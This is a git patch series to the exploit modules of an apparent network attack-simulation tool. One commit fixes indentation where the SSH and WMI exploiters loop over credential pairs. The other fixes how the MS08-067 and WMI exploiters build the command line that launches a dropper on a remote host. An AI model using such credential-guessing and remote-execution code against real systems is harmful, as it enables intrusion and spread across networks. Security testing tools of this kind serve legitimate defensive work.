From 40b03793c9f5b1dc45fc020192698f0f4580eea3 Mon Sep 17 00:00:00 2001 From: Itay Mizeretz Date: Mon, 4 Sep 2017 16:44:40 +0300 Subject: [PATCH 1/2] Fix user_password_pairs indentation bug in --- chaos_monkey/exploit/sshexec.py | 2 +- chaos_monkey/exploit/wmiexec.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/chaos_monkey/exploit/sshexec.py b/chaos_monkey/exploit/sshexec.py index c9ecebaee..0717f5f96 100644 --- a/chaos_monkey/exploit/sshexec.py +++ b/chaos_monkey/exploit/sshexec.py @@ -44,7 +44,7 @@ class SSHExploiter(HostExploiter): LOG.info("SSH port is closed on %r, skipping", host) return False - user_password_pairs = self._config.get_exploit_user_password_pairs() + user_password_pairs = self._config.get_exploit_user_password_pairs() exploited = False for user, curpass in user_password_pairs: diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py index 298ec5436..ab034e416 100644 --- a/chaos_monkey/exploit/wmiexec.py +++ b/chaos_monkey/exploit/wmiexec.py @@ -29,7 +29,7 @@ class WmiExploiter(HostExploiter): LOG.info("Can't find suitable monkey executable for host %r", host) return False - user_password_pairs = self._config.get_exploit_user_password_pairs() + user_password_pairs = self._config.get_exploit_user_password_pairs() for user, password in user_password_pairs: LOG.debug("Attempting to connect %r using WMI with password '%s'", From b420f74a55991e3b1ec61eb7e1060ddde98deb84 Mon Sep 17 00:00:00 2001 From: Itay Mizeretz Date: Mon, 4 Sep 2017 16:51:22 +0300 Subject: [PATCH 2/2] Fix dropper bug on wmiexec and win_ms08_067 --- chaos_monkey/exploit/win_ms08_067.py | 8 ++++---- chaos_monkey/exploit/wmiexec.py | 8 ++++---- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py index a372070a8..ac9f878c7 100644 --- a/chaos_monkey/exploit/win_ms08_067.py +++ b/chaos_monkey/exploit/win_ms08_067.py @@ -249,11 +249,11 @@ class Ms08_067_Exploiter(HostExploiter): # execute the remote dropper in case the path isn't final if remote_full_path.lower() != self._config.dropper_target_path.lower(): - cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ + build_monkey_commandline(host, depth - 1, self._config.dropper_target_path) else: - cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} - - cmdline += build_monkey_commandline(host, depth - 1) + cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ + build_monkey_commandline(host, depth - 1) try: sock.send("start %s\r\n" % (cmdline, )) diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py index ab034e416..312a497da 100644 --- a/chaos_monkey/exploit/wmiexec.py +++ b/chaos_monkey/exploit/wmiexec.py @@ -84,11 +84,11 @@ class WmiExploiter(HostExploiter): return False # execute the remote dropper in case the path isn't final elif remote_full_path.lower() != self._config.dropper_target_path.lower(): - cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ + build_monkey_commandline(host, depth - 1, self._config.dropper_target_path) else: - cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} - - cmdline += build_monkey_commandline(host, depth - 1) + cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ + build_monkey_commandline(host, depth - 1) # execute the remote monkey result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,